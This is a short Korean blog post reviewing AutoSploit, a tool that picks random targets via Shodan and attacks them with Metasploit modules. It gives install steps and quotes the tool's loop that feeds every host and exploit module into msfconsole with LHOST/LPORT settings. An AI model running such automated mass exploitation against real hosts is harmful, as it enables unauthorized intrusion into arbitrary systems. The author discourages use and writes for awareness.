[HACKING] Shodan API와 Metasploit을 이용한 Exploiting script - AutoSploit

원래 LanGhost 내용으로 글 써볼까 헀다가.. (절대 라즈베리파이 키기 귀찮아서 그런게 아닙니다.... 관심있으시면 우선 구글링 고고) 급 주제를 바꾸어 툴 하나에 대해 이야기하도록 하죠.
오늘은 이번주에 나름 핫했던.. AutoSploit입니다.

What is AutoSploit?

AutoSploit은 원격 호스트에 대한 자동 서칭, Exploit 툴, 스크립트 정도로 생각하시면 좋을 것 같습니다. 파이썬 기반의 코드이며 Shodan을 이용해서 임의의 대상을 선정하고, Metasploit 모듈로 Exploiting 합니다.

자동을 대상을 선정하고, 공격하고, 권한을 획득할 수 있다는 점에서 조금 위험한 툴로 보입니다만..  이미 350명이 넘는 사람이 fork 중이네요. (물론 저도..)



File tree
.
├── Docker
│   ├── Dockerfile
│   ├── README.md
│   └── database.yml
├── LICENSE
├── README.md
├── autosploit.py        // Main code
├── modules.txt          // Msf module list
└── requirements.txt  // 추가 요청한거

How to install?

저장소에서 다운로드합니다.

#> git clone https://github.com/NullArray/AutoSploit
#> cd AutoSploit

필요한 라이브러리 설치가 필요합니다.shodan과 blessings 입니다.

#> pip install shodan
#> pip install blessings

pull request를 하나 던져놓긴했는데.. 혹시라도 된다면

pip install -r requirements.txt로 되겠지요.

Metasploit 어떻게 연결했을까?

처음에 툴 내용을 대충보았을땐 Metasploit과 직접 연동되는걸까 라는 생각에 설레였습니다.
쓸만한 데이터가 있을까 코드를 보았는데요..  단순하게 msfonsole command line으로 값을 넘기는 형태입니다.

 elif choice == 'a':
  with open( "hosts.txt", "rb" ) as host_list:
   for rhosts in host_list:
    for exploit in all_modules:
     template = "sudo msfconsole -x 'workspace -a %s; setg LHOST %s; setg LPORT %s; setg VERBOSE true; setg THREADS 100; set RHOSTS %s; %s'" % (workspace, local_host, local_port, rhosts, exploit)
     os.system(template)

재미있는 코드를 기대했지만 조금 아쉬운감이 있었습니다.

Conclusion

이런 종류의 프로젝트나 툴들은 많이 있었을겁니다. 다만 kitploit이나 thehackernews등 매체를 통해서 수면위로 올라온 이상 이를 사용하는 사람들도 분명히 늘어날 것이라 생각됩니다.

윤리적이나 개인의 기술적 발전이나.. 사용하는 것 자체는 추천드리진 않습니다. 그저 이런게 있구나... 하고 알아가시면 좋을 것 같단 생각에 포스팅합니다.
(어차피 침투과정 연습하시는거라도 직접하는게 더 정확하고, 결과도 좋을겁니다)